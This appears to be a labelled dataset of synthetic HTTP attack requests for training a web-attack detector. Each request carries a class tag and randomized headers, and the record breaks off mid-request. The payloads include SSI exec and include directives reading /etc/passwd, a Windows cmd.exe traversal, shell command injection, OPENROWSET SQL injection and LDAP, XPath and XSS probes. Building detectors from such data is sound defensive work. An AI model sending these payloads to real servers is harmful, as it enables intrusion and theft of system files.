Upgrade: aoeac/3.0, iatoE/2.1, a6wo/3.8, e9e/4.3
Warning: 886 5.35.222.218 "heval7tanRnTas" "Mon, 03 Jul 06 13:38:22 UTC"
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37457
Start - Id: 39971
class: SSI
GET /snpygnsvn8ohhbseig/n3ovlHImEmlxhy1r/0b39/lV2nEiJIzfOIAb2RPjQ/iframe3Z8v/noneltd8e8dsaheDi/8ehapnunRle/NgKfx6rn3S.png?sswtga=%2Byxcupdate%3A+l8+u&T04like7Xn@E=%3C%21--+++%23exec+cmd%3D%22%2Fbin%2Fls++-l+++%2Fhome%2Fakd8at%2FNagx%22++++--%3E&UstyleBcatrw.Aj=02&dadnsD5=a6g&29TtAp3uHw=owherewsis%2Ff&9oehRa=Tbkgsr%2Bss27%5C4I&WUvarWqusftpnX3=2895&stdin0lIdeletekAfy=249511&Rlca=aen1&isRrea9ats=slogo9%2F%5Dsfromb HTTP/1.0
Host: 20.104.14.189:80
Connection: close
Accept: audio/basic;q=0.8
Accept-Charset: x-mac-arabic;q=0.7, euc-kr;q=0.4, iso-8859-1;q=0.1
Accept-Encoding: deflate;q=0.4, identity, compress;q=0.1, gzip;q=0.3, compress
Accept-Language: *
Cache-Control: esnlQsy='rmo'
Client-ip: 160.248.173.144
Cookie: xcWst1i=stodo8cd3n(s+2 an&;h5secnuuem=e 5sock_stream@eveuo$;5tooeesi=89;1Ou2NtnrhVm=zae1i4HeeasOso1mS;iulmu1oed=9ca4lobr;g01trhr7giE=aki0h
Cookie2: $Version="03"
Date: Wed, 30 Sep 09 06:25:21 GMT
ETag: W/"AZnigfVHFs0zM56rr"
Expect: a3hy
From: geep3@ewvRfcmr4A.be
If-Modified-Since: Tue, 10 Aug 04 16:33:43 CET
If-Unmodified-Since: Fri, 05 Jun 09 24:30:08 UTC
If-Match: "E6MDRd0xiImAW7GkRm"
If-None-Match: "fihmD7MwCqdTUGA"
If-Range: Tue, 12 Aug 08 13:14:18 CET
Max-Forwards: 40
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: aHtMee s2lgu=6eHelq
Authorization: Basic ZHJpdGpwdm86aXFmZWZj
Range: 75-
Referer: http://5hna.be/elss9tas/c4dsMste.php
TE: trailers,chunked;q=0.5
Trailer: Range
User-Agent: Mozilla/0.1 (Machintosh; U; PPC 4.6; uu-dn; rv:2.2.8) Gecko/11153878
UA-CPU: Sparc
UA-OS: WinNT
UA-Color: color16
Via: 0.8 133.88.95.175, HTTP/9.1 119.227.213.29:5539, FTP/1.9 50.234.198.92
Transfer-Encoding: compress
Upgrade: ebwzs/3.0, wtntaa/3.5, ds8jes/6.2, dad/1.0
Warning: 323 13.31.57.254 "dinvatrVko1snr" 
X-Serial-Number: 754321
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39971
Start - Id: 38277
class: LdapInjection
GET /6kvhH56v69EDkeQ3oB/nF58OiS3Vk9as/seustaneeoszodaoev/mK-A/i4WnmaoiVaerSysadr/o0hwtsFaehchi/pku4Srtxos/rJLFvG-Jp/qxk.png?fhriaha=%29++%28++%7C+%28cn%3D*o+++%27brien*+%29%28mail++++%3D*o%27brien*+%29++&Hg6Kg5LS2wvbscript1=passwd HTTP/1.1
Host: www.ehsHet.be:80
Connection: close
Accept: audio/x-wav, application/rtf;q=0.1, audio/*
Accept-Charset: windows-1254;q=0.4, cp-936
Accept-Encoding: *;q=0.1
Accept-Language: nndrl2-1cyv, it-n, ralop-m8szi1ta;q=0.5, zt7h8-nmaPatrw;q=0.6
Cache-Control: no-store
Client-ip: 227.248.33.223
Cookie: h8n=38
Cookie2: $Version="30"
Date: Thu, 12 Jun 08 03:18:20 UTC
ETag: W/"-Hht-R8UXNeiOEIFFnX"
Expect: rTtAdod=T7c3be;MoOisho=ees3tj
From: iaon@um9ltetugp.biz
If-Modified-Since: Fri, 18 May 07 18:16:33 GMT
If-Unmodified-Since: Sat, 28 Oct 06 11:51:31 UTC
If-Match: "XdH2l0gCAt6oyvun6"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Digest username="mscm"
Authorization: foo83 eitO=Eectedv
Range: 14-
Referer: http://www.nyns.ch/gqerge/soitamt.cgi
TE: deflate,chunked;q=0.7,deflate
Trailer: Proxy-Authorization
User-Agent: rrio4nliucm4zenmyoh
UA-CPU: PowerPC
UA-Disp: 284,6564,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4041x0261
Via: HTTP/2.2 www.ue71f30o.css
Transfer-Encoding: gzip
Upgrade: o4f/8.5, ihuE/9.9
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 165.116.155.114
X-Serial-Number: 70527822
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38277
Start - Id: 43094
class: OsCommanding
GET /hnnci/rcK72dPEVrN6J/spX5L/leyu9lsswtee/ecitercvnyrtnoauouM/sjXHhtylOKa4y/TNNo/eQcZY.css?yEvdinh=842195&esYHzUkpo0r=5525602&ntf4=jP%40C&threhabcneos=s1stNnop6eiF&trd4rattxj50zn=%25iQr%26++&rrggtcb=fLB9NseCDNRO&hnntENa4iTu6j=%5C%3B+++%5C%2Fbin%5C%2Fid+%3B&snetGteaqntGit=mKfZVCZ0tvI&8cmdNZK=a1Zf HTTP/1.1
Host: www.dt6xeOt.biz
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: cp-936;q=0.7, euc-kr, iso-8859-1;q=0.8, cp-936;q=0.5, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 22.135.208.235
Cookie: giblArhete=18;ssetsi=822621;qfacniesrimjsg=stoes1'n\ore4yp;diebcit=oaRhiuwqisa;iuattydqe6rT=[ n1Ig
Cookie2: $Version="41"
Date: Mon, 08 Jan 07 06:50:07 GMT
ETag: W/"as5zU3TltwGEc-Ix0hc"
If-Modified-Since: Mon, 09 Jan 06 20:32:24 CET
If-Unmodified-Since: Tue, 18 Apr 06 19:01:19 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 274
MIME-Version: 1.3
Pragma: Eaa3=ytdk
Authorization: Basic ZWx3dG86cHVsc3U=
Referer: /izep/tcOyher/2210/yx6Ih/glnydpi1.jpg
TE: chunked;q=0.2,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/6.9 (compatible; iatietes; Win 9x; tcjStl1mhi)
UA-OS: Mac OS X
Via: HTTP/2.1 www.5sonfb.png, FTP/8.3 188.35.128.161
Transfer-Encoding: deflate
Upgrade: gowla/8.8, 8aooI/3.3, Tkiyol/1.8
Warning: 212 www.htenLWg.shtml:97715 "ednatrortnk4" "Wed, 22 Apr 09 12:47:41 UTC"
X-Serial-Number: 306986025864028
----: ------------------------------------------------

null

End - Id: 43094
Start - Id: 41192
class: SqlInjection
GET /sm0ee/vtYjIwl9oq/e93dtonj0tglTws/5VD/i@x/tNkz/vagethstI6i0nre/m9UVI2WAWb6N/kuAmTP9a3_Qtgx2zf74/MabD7S0aJ0aPwAw.nsf?Gsaoc2wRn=nyxwcnsrboot.iniat4m&5p=1238064215&ae18o1uhuu=1e4doieatevurvelPa&odbrrAeahvdhea=5qZRd%40Td&e7f1Eeo1tef=02663388&mi7loAshbtSd=887389&mldnnmcf=%2Flexec%24%3C5a%5D%26+libhaving&ruer=08851044&aroaoN=r0q&nd8eieetNlta9=u5JmYTIYDJ0&EalXt6lLeRh=psgftyprENv HTTP/1.0
Host: 211.68.185.81
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: ;   insert     into   OPENROWSET('SQLoledb','uid=r7tS9tly;pwd=it;Network=DBMSSOCN;Address=189.253.112.25,1433;','select    *   from _sysdatabases'  );  select *  from   LinkedOrRemoteSrv1.master.dbo.sysdatabases
Cache-Control: only-if-cached
Client-ip: 5.118.118.210
Cookie: fhuV=423276
Cookie2: $Version="3"
Date: Thu, 10 Feb 05 06:47:43 UTC
ETag: "ThY1cTTEqxmOVuYl"
Expect: ewi8imt=Eenc
From: hnrnbiad@nJninesrqA.biz
If-Modified-Since: Fri, 24 Dec 04 24:15:40 GMT
If-Unmodified-Since: Wed, 23 Nov 05 24:59:04 CET
If-Match: *
If-None-Match: "IDvKLHD.HOVml1XGxW"
If-Range: Sat, 04 Sep 04 02:04:44 CET
Max-Forwards: 47
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic dGxzUDpoZW92aQ==
Authorization: Basic MWl0aWE6MGw0dGNhdA==
Range: 0731-3915
Referer: /sLyslo/oyi4/cRiOd.conf
TE: trailers
Trailer: Date
User-Agent: uhpeOtc/3.9.8
UA-CPU: MIPS
UA-Disp: 8221,0714,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9560x6945
Via: FTP/8.5 233.75.215.126
Transfer-Encoding: identity
Upgrade: eijtn/6.7, lQnT/6.1, aomess/4.2, rhpltp/2.7
Warning: 985 www.enaw.tiff "drga" "Tue, 12 Feb 08 13:07:34 CET"
X-Forwarded-For: 247.67.228.93
X-Serial-Number: 7584461693588
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41192
Start - Id: 43907
class: OsCommanding
GET ..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.ireps.gov
Connection: ohirNsc
Accept: video/*, audio/*;q=0.7
Accept-Charset: windows-1258, windows-1251, windows-874;q=0.2
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: o2hedn='htkrbna'
Client-ip: 196.15.105.143
Cookie: lzxi79Lu=systemdene( ;oe;ov4CystyleVul=22
Cookie2: $Version="45"
Date: Sat, 21 Nov 09 13:13:44 CET
ETag: W/"0oIq-QwFP03wjkKWU"
Expect: aneerIi4
From: hcfetsen@Poenvmrtr.biz
If-Modified-Since: Tue, 14 Jun 05 24:13:49 CET
If-Unmodified-Since: Sat, 26 Jan 08 06:20:32 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 07 Apr 09 08:41:41 UTC
Max-Forwards: 612
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: I7d4 pxamohog=uiio
Authorization: jaier uicSij=Hxcaxs
Range: 6652-,-36477,66590-93
Referer: http://www.inalik.com/eN3et/s9isuyA/nktrFun.php3
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/9.3 (Machintosh; U; PPC 7.7; vy-em; rv:4.3.1) Gecko/09047692
UA-CPU: StrongARM
UA-Disp: 8243,837,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 349x5070
Via: 7.6 www.mlTp.htm, haeeTt/9.4 www.Tb3nN43c.tiff:81740
Transfer-Encoding: deflate
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 432 www.i7dte.html "w6tbf" "Sat, 14 Feb 04 01:47:29 UTC"
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 83787585359566262
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43907
Start - Id: 40879
class: SSI
GET /lnwixaat24smiE7xnc/saXHKHdX0bXe/s1eGhrudHoroeai/l1OD2ruNzZCdL5wU/uOm@eN@8/nyR43PpN./rnom3m7sIeyjoer2r/aleaTanr4tgefiEh/eiieTqriEe2nwhLth7.mspx?eeacrsmnbeD=positionslhttpsa0%3BjiX&dh.xw2=nodmcc&c9D0e=0809041&7IpEqtA42l3u=eOc&bb0uialesbsu=2011581&cuu=tjnnNs0rtTt&UIqbgsound@HCboot.inirHu=815304&ot=oIsystem&ahHnI6ssw=aa&1SIXQ3=dnur9&int=%3C%21--%23odbc+++++statement++%3D+%22select+++++p0r%2C++elv9e0pr%2C+++He+++++from+++7ivads+++++order+++by+++8%2C+++++621%2C++3%22+++++--%3E HTTP/1.0
Host: 62.98.192.34
Connection: keep-alive
Accept: audio/*;q=0.7
Accept-Charset: x-mac-korean;q=0.3, iso-2022-jp, koi8;q=0.7, koi8;q=0.0
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.0
Cache-Control: min-fresh=6084
Client-ip: 158.44.31.77
Cookie: homeiNimg_rcp-_=lnsedmf1Eunrs;WG-JGFA=asock_streamn;Telboaer=eRVm5byi;te88nikrctc2tiH=79;sa4mj3=urlo;oElop4v=rxZX0oyvDF
Cookie2: $Version="63"
Date: Tue, 25 Aug 09 06:09:35 GMT
ETag: "nd2zE-jKRmzyRPpZ@xss"
Expect: Bsieuw=kptnu;mohtt
From: xhslhnd@1eneubz.it
If-Modified-Since: Sun, 30 May 04 13:42:51 CET
If-Unmodified-Since: Sat, 05 Feb 05 12:40:12 UTC
If-Match: "Cv.gMw8tU0yl0NvrNlYy"
If-None-Match: *
If-Range: *
Max-Forwards: 9739
MIME-Version: 8.7
Pragma: munhm='tet'
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: NTLM NGJvb3RUZVVjZ3R0c05tcmVzY29zNmI3a2xpUnBvcjVubGh4c2Z4
Range: 1-,-16972,856295-5
Referer: /aedwsn/gmaggdld/cedao/eO7th.tar.gz
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/5.5 (compatible; MSIE 6.0; Windows NT; sabqro; j6p7; sfH0hi)
UA-CPU: x86
UA-Disp: 998,969,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5993x410
Via: FTP/3.5 212.113.104.246, 2.0 www.anteetit.css, 7.6 34.169.57.124
Transfer-Encoding: iae8a
Upgrade: i72f/4.9, Zi2a/5.6, sifx9/9.1
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 64687084042208
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40879
Start - Id: 38146
class: LdapInjection
GET /laRinsert/rbu0dYB1/U90POyncv.cb8i/8Y8rpEddneuin9i/nz@a63iFB.png?DOmAT5=%25&tUclsmOnriil=8750%29%28%26%28objectClass%3D6ci%29%28%7C%28sn++%3D+ha%29%28cn%3DIt+J*%29%29&ooueHat=10 HTTP/1.0
Host: 104.217.58.92
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: ypixty=ieexxoc
Client-ip: 91.30.161.167
Cookie: E6dke_A_U=06716;betweenscript5andV7F60=430511;1N=etwtHsenel1irTc;nreo1hs=etIecgo9atCeia
Cookie2: $Version="22"
Date: Sun, 06 Jan 08 07:10:15 CET
ETag: "Ptct44HXIkgtS5In"
Expect: 100-continue
From: 7enqeIo@sjtoi.net
If-Modified-Since: Wed, 26 Apr 06 21:48:12 GMT
If-Unmodified-Since: Sat, 20 Dec 08 01:21:46 CET
If-Match: "N3cqanTivdrDhLZxH"
If-None-Match: "-iOTk3vFPLoG365T"
If-Range: "3.s_T6.Yxa7_4EP.C-b"
Max-Forwards: 68
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Basic YWVhbjplamVlY2hjbg==
Authorization: otsn nteso=OgI8
Range: 652463-080254,-92,5914-088
Referer: http://www.iiE0d3.ch/Oeqss9bg/za1i.pdf
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.7 (compatible; MSIE 8.9; Linux i386; Siknxmeq)
UA-CPU: StrongARM
UA-Disp: 651,9493,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 9560x3335
Via: FTP/2.3 www.aie5e.js:0162, FTP/0.4 239.196.125.92:728
Transfer-Encoding: dgxp2s
Upgrade: tfcsu/8.0, late/9.1, 9vp6/5.4, h2zo/6.8, hai3pl/9.2
Warning: 953 www.rhr1crat.jpeg "ndt4er0lwh7ihen2iO" 
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38146
Start - Id: 42042
class: SqlInjection
GET /pHj5/2rosaoentedNcnsc8/u_MtMq8.cgi?nrcip8tdO=u%28k&nssa=%27++++OR++++%27ElRnnh2%27++++%3E+++%27S&nssIItstdatito=h+%3F&esAs8nqrn=o%2Bt%7Ckx&ibtJuanacotca=6fh9o%3Fnhcer&RpTJiRbLNS=534&ev0atOln2gthd=g5ts9eEwd9ahfnebos&adgcolrlheTn=etddiEhsge2ie2h&nbmTytEM=kVILZ2&inYJB8DQtelnetqM=p++ HTTP/1.0
Host: 241.177.32.205:80
Connection: close
Accept: */*
Accept-Charset: euc-tw;q=0.6, euc-jp;q=0.3, windows-1255, iso-8859-6;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 132.226.35.244
Cookie: cmdKIhomethdhjyeQ=5Ln
Cookie2: $Version="2"
Date: Wed, 09 Apr 08 08:20:25 CET
ETag: "wcne.To77bHV22Xl8aXt"
Expect: 100-continue
From: lhrrhh9j@48Flats.biz
If-Modified-Since: Thu, 30 Jun 05 19:50:11 GMT
If-Unmodified-Since: Wed, 26 Apr 06 22:35:29 UTC
If-Match: "VfEM8frSXO.2ibpbdK9"
If-None-Match: *
If-Range: *
Max-Forwards: 87
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: 5heq iYitkt=3sapN
Authorization: Digest response="859b51C4AfBb44A1bAaFB219Eeb03cac"
Range: -7
Referer: http://Eluap.ch/irby.cgi
TE: deflate;q=0.5
Trailer: Accept
User-Agent: Mozilla/4.4 (compatible; Konqueror/5.8; Open BSD i386; Ral7uo; g7ip; Rtrmp)
UA-CPU: x86
UA-Disp: 7502,392,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 422x9399
Via: HTTP/7.4 148.27.16.62
Transfer-Encoding: 9sidq; v4oyRNt=rnxsdz1s
Upgrade: hUrier/3.1, imsa/1.4, hntw/4.9
Warning: 769 10.15.201.53 "Godo5tfeue" "Sat, 19 Aug 06 13:20:24 UTC"
X-Forwarded-For: 183.45.204.126
X-Serial-Number: 78968713276550254
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42042
Start - Id: 39639
class: SSI
GET /nITJAKu/lvUuOk/hcgnfefmo/ovbscripteW/h2meeatdstoujneterl/brneeiiOseec00/rt7ustn7w/avMBoY/ajvS5.html?gemmr=shH0DoCRe1fI&EeZ5sr1yit=4320&MPYY=xrqXtlt&ul=%3C%21--+%23include+++++virtual%3D%22%2Fetc%2Fpasswd%22+++--%3E&rqO8a=ehoh&isjl3i8beulitt=25246 HTTP/1.1
Host: www.miet5.gov:10
Connection: keep-alive
Accept: video/*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: min-fresh=799
Client-ip: 96.129.208.142
Cookie: j59gAit4ento=4;msoudT=dooeAwy7nc5dsett
Cookie2: $Version="2"
Date: Mon, 01 Dec 08 08:59:17 UTC
ETag: W/"vYrhlBgxRcANvEX21"
Expect: 100-continue
From: ae07on@oist3.org
If-Modified-Since: Sun, 11 Nov 07 23:43:13 GMT
If-Unmodified-Since: Tue, 14 Sep 04 02:11:09 GMT
If-Match: "5649_BVinmGcR92K"
If-None-Match: "p2I.-tjfa.t25jpE"
If-Range: Wed, 17 Sep 08 12:56:30 CET
Max-Forwards: 5
MIME-Version: 9.0
Pragma: efer04=sm
Proxy-Authorization: Basic MklyaW46dHI1dDV6b3A=
Authorization: atn9di slo8mnac=aileO
Range: -3
Referer: http://ei53s3.uk/eitezon.bin
TE: trailers,gzip;q=0.0
Trailer: Authorization
User-Agent: drayem6wm3nerItos
UA-CPU: PowerPC
UA-Disp: 749,540,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2034x6396
Via: 6.8 242.243.49.90, FTP/3.7 www.dz3s.png:67, a9fr/7.5 158.243.75.209
Transfer-Encoding: identity
Upgrade: o7s/5.6, dipl/2.7
Warning: 233 www.tttteg.htm "ttmdenotsrmsagg2nt4" "Mon, 21 May 07 21:20:21 CET"
X-Forwarded-For: 209.99.255.194
X-Serial-Number: 659531112
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39639
Start - Id: 46542
class: XSS
GET /<script>alert('Vulnerable')</script>.jsp? HTTP/1.1
Host: www.rehrhss.org:80
Connection: ueuM8
Accept: */*
Accept-Charset: iso-2022-kr;q=0.5, big5, windows-1258;q=0.5, x-mac-arabic;q=0.1, iso-8859-4;q=0.4
Accept-Encoding: *
Accept-Language: Esr-h;q=0.8
Cache-Control: min-fresh=967
Client-ip: 231.203.33.74
Cookie: srnblaIaksxt=1823
Cookie2: $Version="0"
Date: Mon, 10 Sep 07 24:32:19 CET
ETag: "2tchV3o_V1MPEQcePm"
Expect: 100-continue
From: ns7rogjc@npah.it
If-Modified-Since: Sat, 17 Jun 06 03:18:15 CET
If-Unmodified-Since: Wed, 24 May 06 17:59:03 UTC
If-Match: *
If-None-Match: "hPGt9QnybP6VRaKXg"
If-Range: Wed, 30 Dec 09 11:28:25 CET
Max-Forwards: 8
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic OGVwZ29kdWU6c25lcw==
Authorization: Basic cjd0dDpkN2Fxc3RuVw==
Range: 5417-,7803-59243
Referer: http://www.O2oor.be/hvbt.gif
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/4.7 (Windows; U; WinNT 5.5; sg-jr; rv:9.3.5) Gecko/30957634
UA-CPU: x86
UA-Disp: 884,253,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 139x000
Via: el3e/9.3 www.apdoaE.js:684, 3.8 79.205.68.35
Transfer-Encoding: gzip
Upgrade: m51if/7.5, rhhtal/3.2, em5Twu/2.8, pvaaul/4.8, ar9/6.0
Warning: 034 www.etht.jpeg:884 "dpke7ieui1ew0" 
X-Serial-Number: 907134703793407479
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46542
Start - Id: 37954
class: LdapInjection
GET /nAUH9r2/oe8Osheetaiaaiey/saeTafisrsyhTaur8/mdagCaern/HGMVyNQWy52C/8ujpX-_IdZP09sZFgYZL/tlLa_HOK2h6aIopMP6/AMt9a4tea2yn.dll?lsaTyahngai=%2BabetweenhiFmennhtpasswcis&tlenc0=si%40EhNeavRnl%5Dt&frnoeci=1&4knPsnda=tcqoteteimtoiubaro&OrtTcotun=hsY5f%29%28%26%28objectClass++%3D++++nns*%29&eMisyi=cmdDwnieoaOt%5Duaoa&tewrevwnlhLtw=nhO6uo&o4bdue=vt%27%29&MDBlsNupdateCw=casNVi%3F HTTP/1.0
Host: www.ecsiatce.com
Connection: close
Accept: image/gif;q=0.3, text/*;q=0.7, audio/basic
Accept-Charset: *
Accept-Encoding: compress;q=0.1, deflate;q=0.5
Accept-Language: ia-ed;q=0.0, w-CuRo;q=0.7, uqrmzere-ooorahf2, nsyts-wlctlw
Cache-Control: max-stale=2325
Client-ip: 106.160.89.209
Cookie: zh=eSsaqWdr0y3  ;dnrnLwqqglaeet8=f zptaahsecowr;noesuAz=937263;Iebeii=woa;eiOintla4l=ed;atles=Hdnoanie
Cookie2: $Version="2"
Date: Wed, 21 Apr 10 04:51:53 CET
ETag: "Xry4eogdLPlMSdnufTwb"
Expect: psersns=esanan
From: nteal@6riIt.fr
If-Modified-Since: Sat, 23 Jun 07 06:49:43 UTC
If-Unmodified-Since: Tue, 30 Dec 08 20:19:26 UTC
If-Match: "LeDCK94XgF1M8SUM"
If-None-Match: *
If-Range: Sun, 21 Oct 07 20:06:21 UTC
Max-Forwards: 2
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM aXJoenJoN2NpbmdpZnJoY0t0bHNkZW9pc3lkaGI2ZGQ=
Authorization: Digest uri=/msny/cdn9t3U.msf
Range: 03-,-49
Referer: /ua06m/ba9tw.swf
TE: deflate;q=0.1
Trailer: Pragma
User-Agent: idetewsut/6.2.3.9.3
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8848x2681
Via: 3.4 227.238.161.80:3, 8.1 2.242.230.209
Transfer-Encoding: compress
Upgrade: meng/6.1, eFlrhd/9.3, 8sNla/8.7
Warning: 481 177.253.141.56 "egtt5attjooa" "Sun, 25 Apr 10 02:18:55 GMT"
X-Forwarded-For: 82.192.128.217
X-Serial-Number: 8812591
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37954
Start - Id: 40464
class: SSI
GET /Q2nodeWFX08hU6-s/edtEaeracittlcla/Vc9perl/wE7ehhcRiu/2oiZkBmhabefeVrre/t6N.mdb?allgvqhf=oiprocessing-instructionshtpass%5D+%26s6%28aposition&6aofl2Gn7=%3C%21--++%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E&nHlosseB=+hInr HTTP/1.0
Host: 10.58.152.50
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-9;q=0.7, hz-gb-2312;q=0.2, x-mac-cyrillic;q=0.7, utf-7;q=0.5, x-mac-greek;q=0.8
Accept-Encoding: compress;q=0.5, identity, gzip, gzip;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 166.89.179.136
Cookie: ar=er
Cookie2: $Version="35"
Date: Fri, 05 Jun 09 01:44:12 GMT
ETag: W/"CWkiioo0WdACHhp"
Expect: gacnoeoo
From: npmo@pBctcq.com
If-Modified-Since: Mon, 07 Apr 08 19:17:43 CET
If-Unmodified-Since: Fri, 22 Jun 07 01:14:19 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 09 May 09 04:24:11 GMT
Max-Forwards: 57
MIME-Version: 4.8
Pragma: y=2pFrMf
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: Digest nc=9F10e1e0
Range: 6740-758,0802-
Referer: /l4uFpizw.js
TE: trailers,chunked;q=0.9
Trailer: Range
User-Agent: Mozilla/0.5 (compatible; MSIE 1.3; Win 9x; uitsi1I2)
UA-CPU: 68000
UA-Disp: 0939,1824,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 025x185
Via: pwuF/2.7 www.y9aiaws.tiff
Transfer-Encoding: identity
Upgrade: ytiE/1.4
Warning: 466 70.136.39.206 "sssc" 
X-Forwarded-For: 197.226.53.190
X-Serial-Number: 98565372421828
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40464
Start - Id: 37300
class: LdapInjection
PUT /baieOso1Lls/sqEytbMT@ljowV_mo_8r/c27/bB_nO@cSBwzy9QutV/aBniee0ala/dtrrgfieacii01traH3i.css? HTTP/1.1
Content-Length: 179
Content-Language: oisy
Content-Encoding: compress
Content-Location: /egoasesa.aspx
Content-MD5: c2VvbWx1d2U4aWdyYTI3bg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Fri, 10 Sep 04 03:27:38 CET
Host: 190.233.33.105
Connection: close
Accept: */*
Accept-Charset: x-mac-greek, x-mac-turkish
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-stale=9
Cookie: er75m05Mrcpyn=1626418;Uotai=) (  |   (  cn=*o    'brien*    )(mail   =*o   'brien*    )   ;ewesvtl=z;tisnfm=3384
Cookie2: $Version="097"
Date: Thu, 12 Nov 09 10:20:13 CET
Expect: eAFt7n
If-Modified-Since: Sun, 29 Aug 04 15:17:10 CET
If-Unmodified-Since: Wed, 11 Jul 07 08:06:45 UTC
If-Match: *
If-None-Match: "NJ1ph58Jh_b9ix8kjTUj"
If-Range: Wed, 01 Mar 06 17:04:50 GMT
MIME-Version: 9.0
Pragma: rtnsrr=mroux
Authorization: NTLM bGFvY2l4eXlvdGRtN2xhb2xlN3J0NmFyN2VlaWRqbE95UmFtTDhy
Range: -25185,55688-
Referer: /3rtnuoi7/8rtrgT/uemoh2.jpg
Trailer: Pragma
User-Agent: Mozilla/0.3 (Machintosh; U; PPC 1.0; mp-ti; rv:5.8.6) Gecko/12558578
UA-OS: Linux
UA-Pixels: 4413x7019
Via: 4.6 www.trll.png:83, 3.0 www.wmlsH.jpg, FTP/3.8 www.er0seimi.html
Upgrade: iq4psn/6.0, uerla/8.3, yrttaT/5.3
Warning: 638 122.97.122.8 "aeEaockti" 
X-Serial-Number: 2479142458893
----: --------------------------------------------

k9@lKcTmetaCeZt=4&dcO56hp7snymo=2or6 )eeg-Audhoe&7JJylh=re7eousra &YallNSwinntkV=21&tl1f=aexec$eqnkftpxoo&FCYWKKTpA=f2kNO&bgtrnecagoa=ei8euattaNGT10cn&ezbUeoelc=eiaumeorrCl+

End - Id: 37300
Start - Id: 49201
class: XPathInjection
GET /n9DXMT0E@C/f6w/htaccesmetaDFUMYS@@/eMn2vzlet/og5tih5doIbri9Hpmmwb/eHI7RNV9voQ-B/cs/yj/dV4O_RWF_jMZgP3lC/C1SY9gv4.asmx?cugyba=mcd&esCAk=24++or+umtNd%2Fcs%2Fleo%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D5%5D+or+++++423%3D&h@TeYnDDQ6Lb=y%2Bwl1faanz&2a2sad=ebl+l7tobject%25eiqrte&eymr=ttnsA%7C&Q3HJm7Q_LFcW=xestaenp&oeineOarei=amjuJqAQCg5&oednid=eNpM8EABp6id HTTP/1.0
Host: 61.39.213.14
Connection: keep-alive
Accept: */*;q=0.1
